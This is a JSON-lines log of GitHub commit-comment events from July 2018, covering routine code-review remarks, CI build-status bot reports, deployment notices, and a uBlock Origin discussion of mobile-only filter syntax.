{"id":"7931013678","type":"CommitCommentEvent","actor":{"login":"iNewLegend"},"repo":{"name":"friends-of-reactphp/mysql"},"payload":{"comment":{"id":29626390,"position":null,"line":null,"path":null,"commit_id":"57710a16485a26dfe211fc33a73937cb18aa9c43","created_at":"2018-07-06T21:24:34Z","updated_at":"2018-07-06T21:24:34Z","author_association":"NONE","body":"Why is the reason for that?"}},"created_at":"2018-07-06T21:24:34Z"}
{"id":"7931014206","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29626391,"position":null,"line":null,"path":null,"commit_id":"ece1724d71ce1f8ebc476d2005fb7e172e7136f9","created_at":"2018-07-06T21:24:43Z","updated_at":"2018-07-06T21:24:43Z","author_association":"NONE","body":"Allow-Multiple-AirLoops-in-Airflow-Netwrok-Model (lgu1234) - i386-Windows-7-VisualStudio-14: OK (2935 of 2935 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ece1724d71ce1f8ebc476d2005fb7e172e7136f9-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ece1724d71ce1f8ebc476d2005fb7e172e7136f9-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-06T21:24:43Z"}
{"id":"7931014699","type":"CommitCommentEvent","actor":{"login":"carlosgit2016"},"repo":{"name":"MatheusMuriel/Sistema-FuraFila-de-Atendimentos"},"payload":{"comment":{"id":29626395,"position":null,"line":null,"path":null,"commit_id":"049f5654834a5bc64342dda8d0e4def60b74b58d","created_at":"2018-07-06T21:24:52Z","updated_at":"2018-07-06T21:24:52Z","author_association":"NONE","body":"Tá ficando fácil os projetos do Ricardo"}},"created_at":"2018-07-06T21:24:52Z"}
{"id":"7931015298","type":"CommitCommentEvent","actor":{"login":"mapx-"},"repo":{"name":"uBlockOrigin/uAssets"},"payload":{"comment":{"id":29626398,"position":null,"line":null,"path":null,"commit_id":"8f42fafd9287e8041559ca4d127903afd18a6149","created_at":"2018-07-06T21:25:01Z","updated_at":"2018-07-06T21:25:01Z","author_association":"CONTRIBUTOR","body":"I want to avoid that rule for mobile, it isnt ok ?"}},"created_at":"2018-07-06T21:25:01Z"}
{"id":"7931033087","type":"CommitCommentEvent","actor":{"login":"Mouvedia"},"repo":{"name":"letorbi/tarp.require"},"payload":{"comment":{"id":29626443,"position":18,"line":86,"path":"require.js","commit_id":"3a6ccc682ed384490bee7ba74cc1b3487ff3044a","created_at":"2018-07-06T21:30:00Z","updated_at":"2018-07-06T21:30:00Z","author_association":"NONE","body":"[My comment](https://github.com/letorbi/tarp.require/commit/3a6ccc682ed384490bee7ba74cc1b3487ff3044a#r29621844) down there refers to IE8+."}},"created_at":"2018-07-06T21:30:00Z"}
{"id":"7931033737","type":"CommitCommentEvent","actor":{"login":"origindesign"},"repo":{"name":"origindesign/skitaos"},"payload":{"comment":{"id":29626447,"position":null,"line":null,"path":null,"commit_id":"099a7374ad5afdf611c8910b43d3909b46f285e1","created_at":"2018-07-06T21:30:12Z","updated_at":"2018-07-06T21:30:12Z","author_association":"OWNER","body":"Created multidev environment [ski-taos#ci-18](https://dashboard.pantheon.io/sites/22e63f3f-bdff-4894-a158-a29f219020d1#ci-18).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-18-ski-taos.pantheonsite.io/)"}},"created_at":"2018-07-06T21:30:12Z"}
{"id":"7931035234","type":"CommitCommentEvent","actor":{"login":"shefty"},"repo":{"name":"yburette/libfabric"},"payload":{"comment":{"id":29626452,"position":78,"line":299,"path":"prov/mrail/src/mrail.h","commit_id":"69e76689081e2d11f7a02d190a32e2c476679237","created_at":"2018-07-06T21:30:35Z","updated_at":"2018-07-06T21:30:35Z","author_association":"NONE","body":"So, this would be an array of remote addresses?  Is that allocated dynamically?\r\n\r\nHmm... if the request is sized dynamically, maybe the subrequests should just be part of the same structure instead of being stored on a list.  How did message transfers handle this?"}},"created_at":"2018-07-06T21:30:35Z"}
{"id":"7931040778","type":"CommitCommentEvent","actor":{"login":"johnbocaligsage"},"repo":{"name":"sagetreesd/pakmail-franchising"},"payload":{"comment":{"id":29626460,"position":null,"line":null,"path":null,"commit_id":"57bf349b9f228a3c482ca32b5106f86abf083210","created_at":"2018-07-06T21:32:12Z","updated_at":"2018-07-06T21:32:12Z","author_association":"COLLABORATOR","body":"Created multidev environment [pakmail-franchising#ci-64](https://dashboard.pantheon.io/sites/8a4447b4-69fe-419a-b0ba-20c6317d8b0c#ci-64).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-64-pakmail-franchising.pantheonsite.io/)"}},"created_at":"2018-07-06T21:32:12Z"}
{"id":"7931040872","type":"CommitCommentEvent","actor":{"login":"yburette"},"repo":{"name":"yburette/libfabric"},"payload":{"comment":{"id":29626461,"position":34,"line":191,"path":"prov/mrail/src/mrail_cq.c","commit_id":"69e76689081e2d11f7a02d190a32e2c476679237","created_at":"2018-07-06T21:32:14Z","updated_at":"2018-07-06T21:32:14Z","author_association":"OWNER","body":"Yes, this is the current striping scheme. I'll combine the allocations then."}},"created_at":"2018-07-06T21:32:14Z"}
{"id":"7931040887","type":"CommitCommentEvent","actor":{"login":"justin-yan"},"repo":{"name":"tmwilder/MustHaveEditorShortcuts"},"payload":{"comment":{"id":29626462,"position":21,"line":21,"path":"README.md","commit_id":"b2852dc22090b5bef9e5d3f5256ac81f4d9e1db3","created_at":"2018-07-06T21:32:14Z","updated_at":"2018-07-06T21:32:14Z","author_association":"NONE","body":"The inverse too: find usages"}},"created_at":"2018-07-06T21:32:14Z"}
{"id":"7931047074","type":"CommitCommentEvent","actor":{"login":"dan-zheng"},"repo":{"name":"apple/swift"},"payload":{"comment":{"id":29626475,"position":4,"line":29,"path":"include/swift/AST/AutoDiff.h","commit_id":"c70617d29d21c39ec0cba465b695a2d36399e15c","created_at":"2018-07-06T21:33:54Z","updated_at":"2018-07-06T21:33:54Z","author_association":"COLLABORATOR","body":"Done in https://github.com/apple/swift/pull/17799/commits/1b5b051b126618e5af8f8d5235fae3efadbdac83."}},"created_at":"2018-07-06T21:33:54Z"}
{"id":"7931048429","type":"CommitCommentEvent","actor":{"login":"dan-zheng"},"repo":{"name":"apple/swift"},"payload":{"comment":{"id":29626478,"position":35,"line":1306,"path":"lib/Sema/CSGen.cpp","commit_id":"c70617d29d21c39ec0cba465b695a2d36399e15c","created_at":"2018-07-06T21:34:16Z","updated_at":"2018-07-06T21:34:16Z","author_association":"COLLABORATOR","body":"Done in https://github.com/apple/swift/pull/17799/commits/1b5b051b126618e5af8f8d5235fae3efadbdac83."}},"created_at":"2018-07-06T21:34:16Z"}
{"id":"7931048884","type":"CommitCommentEvent","actor":{"login":"waqqasmohd"},"repo":{"name":"waqqasmohd/NoteCrates"},"payload":{"comment":{"id":29626481,"position":null,"line":null,"path":null,"commit_id":"4ddd4c995fcfd1ff661c87e639f252f7c7fd114c","created_at":"2018-07-06T21:34:22Z","updated_at":"2018-07-06T21:34:22Z","author_association":"OWNER","body":"teri meri merge karra\r\n"}},"created_at":"2018-07-06T21:34:22Z"}
{"id":"7931052406","type":"CommitCommentEvent","actor":{"login":"IsraaMoqbel"},"repo":{"name":"ZooeyMiller/ws-what-is-this"},"payload":{"comment":{"id":29626485,"position":138,"line":182,"path":"README.md","commit_id":"34826fbd23294a960aa10965f37efc1047a90c31","created_at":"2018-07-06T21:35:21Z","updated_at":"2018-07-06T21:35:21Z","author_association":"NONE","body":"Typo: test* not jest"}},"created_at":"2018-07-06T21:35:21Z"}
{"id":"7931054823","type":"CommitCommentEvent","actor":{"login":"evenbrande"},"repo":{"name":"evenbrande/HelloWorld"},"payload":{"comment":{"id":29626488,"position":null,"line":null,"path":null,"commit_id":"689cdbfb5febfeefccaea89804346419c0df4d21","created_at":"2018-07-06T21:36:01Z","updated_at":"2018-07-06T21:36:01Z","author_association":"OWNER","body":"Merging"}},"created_at":"2018-07-06T21:36:01Z"}
{"id":"7931057205","type":"CommitCommentEvent","actor":{"login":"whereswaldon"},"repo":{"name":"ravernkoh/kfreestyle2d"},"payload":{"comment":{"id":29626497,"position":null,"line":null,"path":null,"commit_id":"af52f86ed064432ce78c9844efb79af8e9683c71","created_at":"2018-07-06T21:36:38Z","updated_at":"2018-07-06T21:36:38Z","author_association":"NONE","body":"I assume that you're on a non-debian distro that needed this tweak? If you'd like to submit a PR that conditionally calls the right utility, I'd be happy to accept it."}},"created_at":"2018-07-06T21:36:38Z"}
{"id":"7931058095","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29626500,"position":null,"line":null,"path":null,"commit_id":"ece1724d71ce1f8ebc476d2005fb7e172e7136f9","created_at":"2018-07-06T21:36:53Z","updated_at":"2018-07-06T21:36:53Z","author_association":"NONE","body":"Allow-Multiple-AirLoops-in-Airflow-Netwrok-Model (lgu1234) - x86_64-MacOS-10.9-clang: OK (2935 of 2935 tests passed, 10 test warnings)\n\nMessages:\n\n * 8 tests had: AUD diffs.\n * 1 test had: BND diffs.\n * 1 test had: ERR diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ece1724d71ce1f8ebc476d2005fb7e172e7136f9-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ece1724d71ce1f8ebc476d2005fb7e172e7136f9-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-06T21:36:53Z"}
{"id":"7931060376","type":"CommitCommentEvent","actor":{"login":"okiehsch"},"repo":{"name":"uBlockOrigin/uAssets"},"payload":{"comment":{"id":29626503,"position":null,"line":null,"path":null,"commit_id":"8f42fafd9287e8041559ca4d127903afd18a6149","created_at":"2018-07-06T21:37:32Z","updated_at":"2018-07-06T21:37:32Z","author_association":"CONTRIBUTOR","body":"````\r\n!#if env_mobile\r\n quora.com##[id*=wrapper]:has-text(/ad\\s{1,}by /i)\r\n!#endif\r\n````\r\navoids the rule for mobile."}},"created_at":"2018-07-06T21:37:32Z"}
{"id":"7931062250","type":"CommitCommentEvent","actor":{"login":"ldash"},"repo":{"name":"RGLab/immport"},"payload":{"comment":{"id":29626505,"position":null,"line":null,"path":null,"commit_id":"4a2c0f14cb3758a3c9f87ba07c787f0a12c93f5f","created_at":"2018-07-06T21:38:03Z","updated_at":"2018-07-06T21:38:03Z","author_association":"MEMBER","body":"@labkey-matthewb nice, so my hack with the header image actually had the potential of being fully functional!"}},"created_at":"2018-07-06T21:38:03Z"}
{"id":"7931064458","type":"CommitCommentEvent","actor":{"login":"mwarning"},"repo":{"name":"dakhnod/Meshenger"},"payload":{"comment":{"id":29626511,"position":141,"line":328,"path":"app/src/main/java/d/d/meshenger/MainService.java","commit_id":"e96867ec3f26475b7ce3f5121d006d143506ae10","created_at":"2018-07-06T21:38:43Z","updated_at":"2018-07-06T21:38:43Z","author_association":"NONE","body":"Wir das automatisch gemacht? Ich wundere mich nur warum du das dann weiter unten explizit machst."}},"created_at":"2018-07-06T21:38:43Z"}
{"id":"7931069561","type":"CommitCommentEvent","actor":{"login":"victoriaogomes"},"repo":{"name":"viubis/Eng.-Software"},"payload":{"comment":{"id":29626523,"position":null,"line":null,"path":null,"commit_id":"1f8b28297aaa8c1d3eb301a9a10920e5d163e041","created_at":"2018-07-06T21:40:12Z","updated_at":"2018-07-06T21:40:12Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Adicionar campo para verificar digito verificador da conta](https://trello.com/c/g4Aek9FJ/196-adicionar-campo-para-verificar-digito-verificador-da-conta)"}},"created_at":"2018-07-06T21:40:12Z"}
{"id":"7931072578","type":"CommitCommentEvent","actor":{"login":"devshgraphicsprogramming"},"repo":{"name":"Crisspl/IrrlichtBAW"},"payload":{"comment":{"id":29626527,"position":13,"line":57,"path":"examples_tests/28.Benchmark/main_vs.h","commit_id":"c05ed26fef3bc1339f54b0faf74585462b81436b","created_at":"2018-07-06T21:40:55Z","updated_at":"2018-07-06T21:40:55Z","author_association":"NONE","body":"if `ATTRIB_DIVISOR` is 1 then make the buffer 40 bytes"}},"created_at":"2018-07-06T21:40:55Z"}
{"id":"7931072664","type":"CommitCommentEvent","actor":{"login":"yburette"},"repo":{"name":"yburette/libfabric"},"payload":{"comment":{"id":29626528,"position":78,"line":299,"path":"prov/mrail/src/mrail.h","commit_id":"69e76689081e2d11f7a02d190a32e2c476679237","created_at":"2018-07-06T21:40:56Z","updated_at":"2018-07-06T21:40:56Z","author_association":"OWNER","body":"Similarly, I think. We call ofi_av_get_addr() to get a pointer to the array of fi_addr_t's. Then we use the rail's corresponding remote address.\r\nHere I store the pointer so I don't have to call ofi_av_get_addr() every time we try posting."}},"created_at":"2018-07-06T21:40:56Z"}
{"id":"7931074122","type":"CommitCommentEvent","actor":{"login":"mwarning"},"repo":{"name":"dakhnod/Meshenger"},"payload":{"comment":{"id":29626532,"position":177,"line":364,"path":"app/src/main/java/d/d/meshenger/MainService.java","commit_id":"e96867ec3f26475b7ce3f5121d006d143506ae10","created_at":"2018-07-06T21:41:20Z","updated_at":"2018-07-06T21:41:20Z","author_association":"NONE","body":"Hm, kapiere ich nicht. Wenn du zum loop label zurückspringst interierst du ja wieder über addresses. Und die Elemente darin haben sich ja nicht geändert. Also springt er wieder zurück zum Label loop."}},"created_at":"2018-07-06T21:41:20Z"}
{"id":"7931074439","type":"CommitCommentEvent","actor":{"login":"devshgraphicsprogramming"},"repo":{"name":"Crisspl/IrrlichtBAW"},"payload":{"comment":{"id":29626533,"position":null,"line":null,"path":null,"commit_id":"c05ed26fef3bc1339f54b0faf74585462b81436b","created_at":"2018-07-06T21:41:26Z","updated_at":"2018-07-06T21:41:26Z","author_association":"NONE","body":"remember about my remarks about the `sin` instruction in the vertex shaders"}},"created_at":"2018-07-06T21:41:26Z"}
{"id":"7931074740","type":"CommitCommentEvent","actor":{"login":"mapx-"},"repo":{"name":"uBlockOrigin/uAssets"},"payload":{"comment":{"id":29626534,"position":null,"line":null,"path":null,"commit_id":"8f42fafd9287e8041559ca4d127903afd18a6149","created_at":"2018-07-06T21:41:32Z","updated_at":"2018-07-06T21:41:32Z","author_association":"CONTRIBUTOR","body":"As I know `!`  is the logi negation, so that rule will be ok other environment (and not for mobile)\r\n\r\nSame here (ok for other browsers but not for firefox):\r\n```\r\n!#if !env_firefox\r\n||piguiqproxy.com/api$xmlhttprequest,redirect=nooptext,domain=kinozal.tv\r\n!#endif\r\n```\r\n"}},"created_at":"2018-07-06T21:41:32Z"}
{"id":"7931074786","type":"CommitCommentEvent","actor":{"login":"tidify"},"repo":{"name":"Bitspark/slang-ui"},"payload":{"comment":{"id":29626535,"position":5,"line":612,"path":"src/app/utils.ts","commit_id":"e07e6714b7472f91a9029d5e7e9976ff5c4e0072","created_at":"2018-07-06T21:41:32Z","updated_at":"2018-07-06T21:41:32Z","author_association":"MEMBER","body":"@jm9e nutzt doch `Vec2` statt `[number, number]`"}},"created_at":"2018-07-06T21:41:32Z"}
{"id":"7931080008","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":29626546,"position":null,"line":null,"path":null,"commit_id":"c67a41ad9ec2d786fe9849c17ac489a901a1b414","created_at":"2018-07-06T21:42:57Z","updated_at":"2018-07-06T21:42:57Z","author_association":"NONE","body":"The following doc(s) have been deployed to the [jfussionwo](https://jfussionwo-static-docs.pantheonsite.io/docs) Multidev environment:\n- [/docs/new-plans-faq](https://jfussionwo-static-docs.pantheonsite.io/docs/new-plans-faq)\n"}},"created_at":"2018-07-06T21:42:57Z"}
{"id":"7931084763","type":"CommitCommentEvent","actor":{"login":"okiehsch"},"repo":{"name":"uBlockOrigin/uAssets"},"payload":{"comment":{"id":29626557,"position":null,"line":null,"path":null,"commit_id":"8f42fafd9287e8041559ca4d127903afd18a6149","created_at":"2018-07-06T21:44:23Z","updated_at":"2018-07-06T21:44:23Z","author_association":"CONTRIBUTOR","body":"Hm, we have a filter\r\n````\r\n!#if env_firefox\r\n@@||springserve.com/vast/*einthusan$xmlhttprequest,domain=imasdk.googleapis.com\r\n!#endif\r\n````\r\nthat obviously was added with the intention of not working with Firefox, I will test it."}},"created_at":"2018-07-06T21:44:23Z"}
{"id":"7931087164","type":"CommitCommentEvent","actor":{"login":"skmedix"},"repo":{"name":"Commit451/skyhook"},"payload":{"comment":{"id":29626561,"position":null,"line":null,"path":null,"commit_id":"19f2ce150364aca22979c831e2d0ed50f06b6b8d","created_at":"2018-07-06T21:45:08Z","updated_at":"2018-07-06T21:45:08Z","author_association":"CONTRIBUTOR","body":"Title of that commit is pretty accurate 😂 "}},"created_at":"2018-07-06T21:45:08Z"}
{"id":"7931092959","type":"CommitCommentEvent","actor":{"login":"mapx-"},"repo":{"name":"uBlockOrigin/uAssets"},"payload":{"comment":{"id":29626581,"position":null,"line":null,"path":null,"commit_id":"8f42fafd9287e8041559ca4d127903afd18a6149","created_at":"2018-07-06T21:46:45Z","updated_at":"2018-07-06T21:46:45Z","author_association":"CONTRIBUTOR","body":"`if not env_firefox = if !env_firefox`"}},"created_at":"2018-07-06T21:46:45Z"}
{"id":"7931101959","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29626600,"position":null,"line":null,"path":null,"commit_id":"6c7531ea10c5afa5ef04487def2c5772a1a5d480","created_at":"2018-07-06T21:49:24Z","updated_at":"2018-07-06T21:49:24Z","author_association":"NONE","body":"#6599-HVACAirloopUnitarySystem-does-not-honor-continuous-fan-mode-using-multispeed-heating-coil (rraustad) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1685 of 1685 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-6c7531ea10c5afa5ef04487def2c5772a1a5d480-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-6c7531ea10c5afa5ef04487def2c5772a1a5d480-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-6c7531ea10c5afa5ef04487def2c5772a1a5d480-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-40.18%25-green.png)</a>\n"}},"created_at":"2018-07-06T21:49:24Z"}
{"id":"7931102009","type":"CommitCommentEvent","actor":{"login":"letorbi"},"repo":{"name":"letorbi/tarp.require"},"payload":{"comment":{"id":29626601,"position":18,"line":86,"path":"require.js","commit_id":"3a6ccc682ed384490bee7ba74cc1b3487ff3044a","created_at":"2018-07-06T21:49:25Z","updated_at":"2018-07-06T21:49:25Z","author_association":"OWNER","body":"> You are wrong but that doesn't matter; do as you want.\r\n\r\n I my assumption might be wrong here, of course. Can you explain what would happen in Chrome 28 for example? Would it throw an exception, if I try to set `request.timeout`?"}},"created_at":"2018-07-06T21:49:25Z"}
{"id":"7931104501","type":"CommitCommentEvent","actor":{"login":"letorbi"},"repo":{"name":"letorbi/tarp.require"},"payload":{"comment":{"id":29626606,"position":26,"line":106,"path":"require.js","commit_id":"3a6ccc682ed384490bee7ba74cc1b3487ff3044a","created_at":"2018-07-06T21:50:13Z","updated_at":"2018-07-06T21:50:13Z","author_association":"OWNER","body":"Thx for the hint. I'll fix this."}},"created_at":"2018-07-06T21:50:13Z"}
{"id":"7931105809","type":"CommitCommentEvent","actor":{"login":"MasterDuke17"},"repo":{"name":"perl6/nqp"},"payload":{"comment":{"id":29626607,"position":9,"line":9,"path":"src/vm/jvm/runtime/org/perl6/nqp/truffle/NQPHash.java","commit_id":"f502ee0f18c0e570570823615513f2cd4f65ac5f","created_at":"2018-07-06T21:50:37Z","updated_at":"2018-07-06T21:50:37Z","author_association":"CONTRIBUTOR","body":"\"new new\"?"}},"created_at":"2018-07-06T21:50:37Z"}
{"id":"7931109559","type":"CommitCommentEvent","actor":{"login":"okiehsch"},"repo":{"name":"uBlockOrigin/uAssets"},"payload":{"comment":{"id":29626616,"position":null,"line":null,"path":null,"commit_id":"8f42fafd9287e8041559ca4d127903afd18a6149","created_at":"2018-07-06T21:51:47Z","updated_at":"2018-07-06T21:51:47Z","author_association":"CONTRIBUTOR","body":"You are right, but `https://www.quora.com/How-do-I-learn-machine-learning-1`\r\nwith up to date filters  and using a mobile device leads to\r\n![image](https://user-images.githubusercontent.com/16838044/42401763-6f7b2940-8177-11e8-8e5a-81f83cd0b3e2.png)\r\non my end.\r\n\r\n\r\n"}},"created_at":"2018-07-06T21:51:47Z"}
{"id":"7931109769","type":"CommitCommentEvent","actor":{"login":"Azharoo"},"repo":{"name":"remon/pythonCodes"},"payload":{"comment":{"id":29626618,"position":null,"line":null,"path":null,"commit_id":"d7ad1360bf2c0877463b0ebaeb9c9260ae6ab58c","created_at":"2018-07-06T21:51:51Z","updated_at":"2018-07-06T21:51:51Z","author_association":"CONTRIBUTOR","body":"الرجاء ايجاد حل لمشكلة تكرار المواضيع مثلا pop() موجود هنا Lists\\List_Methods"}},"created_at":"2018-07-06T21:51:51Z"}
{"id":"7931112313","type":"CommitCommentEvent","actor":{"login":"devshgraphicsprogramming"},"repo":{"name":"Crisspl/IrrlichtBAW"},"payload":{"comment":{"id":29626625,"position":181,"line":181,"path":"examples_tests/28.Benchmark/main_cs.h","commit_id":"f5bce8b0b05189c3873e1fadaf31ae84007824d9","created_at":"2018-07-06T21:52:37Z","updated_at":"2018-07-06T21:52:37Z","author_association":"NONE","body":"this scope needs to go"}},"created_at":"2018-07-06T21:52:37Z"}
{"id":"7931114115","type":"CommitCommentEvent","actor":{"login":"mapx-"},"repo":{"name":"uBlockOrigin/uAssets"},"payload":{"comment":{"id":29626628,"position":null,"line":null,"path":null,"commit_id":"8f42fafd9287e8041559ca4d127903afd18a6149","created_at":"2018-07-06T21:53:10Z","updated_at":"2018-07-06T21:53:10Z","author_association":"CONTRIBUTOR","body":"probably there is still other rule to avoid / or change for mobile, I cannot test them"}},"created_at":"2018-07-06T21:53:10Z"}
{"id":"7931114709","type":"CommitCommentEvent","actor":{"login":"devshgraphicsprogramming"},"repo":{"name":"Crisspl/IrrlichtBAW"},"payload":{"comment":{"id":29626630,"position":null,"line":null,"path":null,"commit_id":"f5bce8b0b05189c3873e1fadaf31ae84007824d9","created_at":"2018-07-06T21:53:21Z","updated_at":"2018-07-06T21:53:21Z","author_association":"NONE","body":"the CS benchmark looks more or less ok"}},"created_at":"2018-07-06T21:53:21Z"}
{"id":"7931116087","type":"CommitCommentEvent","actor":{"login":"okiehsch"},"repo":{"name":"uBlockOrigin/uAssets"},"payload":{"comment":{"id":29626633,"position":null,"line":null,"path":null,"commit_id":"8f42fafd9287e8041559ca4d127903afd18a6149","created_at":"2018-07-06T21:53:45Z","updated_at":"2018-07-06T21:53:45Z","author_association":"CONTRIBUTOR","body":"If I add \r\n````\r\n!#if env_mobile\r\nquora.com##[id*=wrapper]:has-text(/ad\\s{1,}by /i)\r\n!#endif\r\n```\r\n![image](https://user-images.githubusercontent.com/16838044/42401835-cc0dd37e-8177-11e8-9dfb-c22bbd5cf8fb.png)\r\n\r\n"}},"created_at":"2018-07-06T21:53:45Z"}
{"id":"7931117107","type":"CommitCommentEvent","actor":{"login":"mapx-"},"repo":{"name":"uBlockOrigin/uAssets"},"payload":{"comment":{"id":29626635,"position":null,"line":null,"path":null,"commit_id":"8f42fafd9287e8041559ca4d127903afd18a6149","created_at":"2018-07-06T21:54:06Z","updated_at":"2018-07-06T21:54:06Z","author_association":"CONTRIBUTOR","body":"However, it's explained here:\r\nhttps://github.com/gorhill/uBlock/wiki/Static-filter-syntax#if-condition"}},"created_at":"2018-07-06T21:54:06Z"}
{"id":"7931120442","type":"CommitCommentEvent","actor":{"login":"dakhnod"},"repo":{"name":"dakhnod/Meshenger"},"payload":{"comment":{"id":29626641,"position":177,"line":364,"path":"app/src/main/java/d/d/meshenger/MainService.java","commit_id":"e96867ec3f26475b7ce3f5121d006d143506ae10","created_at":"2018-07-06T21:55:08Z","updated_at":"2018-07-06T21:55:08Z","author_association":"OWNER","body":"wo genau mache ich dass denn explizit?"}},"created_at":"2018-07-06T21:55:08Z"}
{"id":"7931121949","type":"CommitCommentEvent","actor":{"login":"isuruf"},"repo":{"name":"CJ-Wright/cf-scripts"},"payload":{"comment":{"id":29626647,"position":16,"line":430,"path":"conda_forge_tick/migrators.xsh","commit_id":"92e3cd472c58c962f457689c57241ba6342217d6","created_at":"2018-07-06T21:55:34Z","updated_at":"2018-07-06T21:55:34Z","author_association":"NONE","body":"`build_idx = [l.rstrip() for l in attrs['raw_meta_yaml'].split('\\n')].index('build:')`"}},"created_at":"2018-07-06T21:55:34Z"}
{"id":"7931122209","type":"CommitCommentEvent","actor":{"login":"dakhnod"},"repo":{"name":"dakhnod/Meshenger"},"payload":{"comment":{"id":29626648,"position":141,"line":328,"path":"app/src/main/java/d/d/meshenger/MainService.java","commit_id":"e96867ec3f26475b7ce3f5121d006d143506ae10","created_at":"2018-07-06T21:55:38Z","updated_at":"2018-07-06T21:55:38Z","author_association":"OWNER","body":"wo genau mache ich das denn explizit?"}},"created_at":"2018-07-06T21:55:38Z"}
{"id":"7931125819","type":"CommitCommentEvent","actor":{"login":"dakhnod"},"repo":{"name":"dakhnod/Meshenger"},"payload":{"comment":{"id":29626656,"position":177,"line":364,"path":"app/src/main/java/d/d/meshenger/MainService.java","commit_id":"e96867ec3f26475b7ce3f5121d006d143506ae10","created_at":"2018-07-06T21:56:46Z","updated_at":"2018-07-06T21:56:46Z","author_association":"OWNER","body":"Wenn ich zu dem label zurückspringe wird die address-variable mit dem nächsten objekt aus der addresses-liste gefüllt."}},"created_at":"2018-07-06T21:56:46Z"}
{"id":"7931126536","type":"CommitCommentEvent","actor":{"login":"marcoabreu"},"repo":{"name":"apache/incubator-mxnet"},"payload":{"comment":{"id":29626657,"position":6,"line":78,"path":"tools/flakiness_checker.py","commit_id":"16bf6b7f1a51a5ce9cbea3a2efcd45c2e7ad1e2d","created_at":"2018-07-06T21:56:59Z","updated_at":"2018-07-06T21:56:59Z","author_association":"CONTRIBUTOR","body":"Try to be a bit more specific to avoid having people look into the code to figure out what's wrong. E.g. \"Invalid argument format for --test (replace with the argument name). Format: XXX or YYY\""}},"created_at":"2018-07-06T21:56:59Z"}
{"id":"7931126840","type":"CommitCommentEvent","actor":{"login":"okiehsch"},"repo":{"name":"uBlockOrigin/uAssets"},"payload":{"comment":{"id":29626658,"position":null,"line":null,"path":null,"commit_id":"8f42fafd9287e8041559ca4d127903afd18a6149","created_at":"2018-07-06T21:57:06Z","updated_at":"2018-07-06T21:57:06Z","author_association":"CONTRIBUTOR","body":"Yeah, I just read that too, but my results are different as you can see, what happens on your end if you use\r\nthis setup?\r\n\r\n![image](https://user-images.githubusercontent.com/16838044/42401927-44dc1018-8178-11e8-8188-882f85071b0b.png)\r\n"}},"created_at":"2018-07-06T21:57:06Z"}
{"id":"7931127333","type":"CommitCommentEvent","actor":{"login":"bongsitata"},"repo":{"name":"bongsitata/hello-world"},"payload":{"comment":{"id":29626659,"position":null,"line":null,"path":null,"commit_id":"1be4d8368bee4f8bee89418c8cf5cb6bcfb2f669","created_at":"2018-07-06T21:57:16Z","updated_at":"2018-07-06T21:57:16Z","author_association":"OWNER","body":"changed the word "}},"created_at":"2018-07-06T21:57:16Z"}
{"id":"7931127723","type":"CommitCommentEvent","actor":{"login":"waqarfullstack"},"repo":{"name":"waqarfullstack/slimangular"},"payload":{"comment":{"id":29626660,"position":null,"line":null,"path":null,"commit_id":"d5996900cb3445cdd68934d99b41a473b4d99bc5","created_at":"2018-07-06T21:57:24Z","updated_at":"2018-07-06T21:57:24Z","author_association":"OWNER","body":"The highlighted path needs to be changed as per your local path of the package"}},"created_at":"2018-07-06T21:57:24Z"}
{"id":"7931130017","type":"CommitCommentEvent","actor":{"login":"mapx-"},"repo":{"name":"uBlockOrigin/uAssets"},"payload":{"comment":{"id":29626667,"position":null,"line":null,"path":null,"commit_id":"8f42fafd9287e8041559ca4d127903afd18a6149","created_at":"2018-07-06T21:58:08Z","updated_at":"2018-07-06T21:58:08Z","author_association":"CONTRIBUTOR","body":"I'll try testing, but if the behaviour is completely opposite ..could be a bug (for mobile) ? @gorhill "}},"created_at":"2018-07-06T21:58:08Z"}
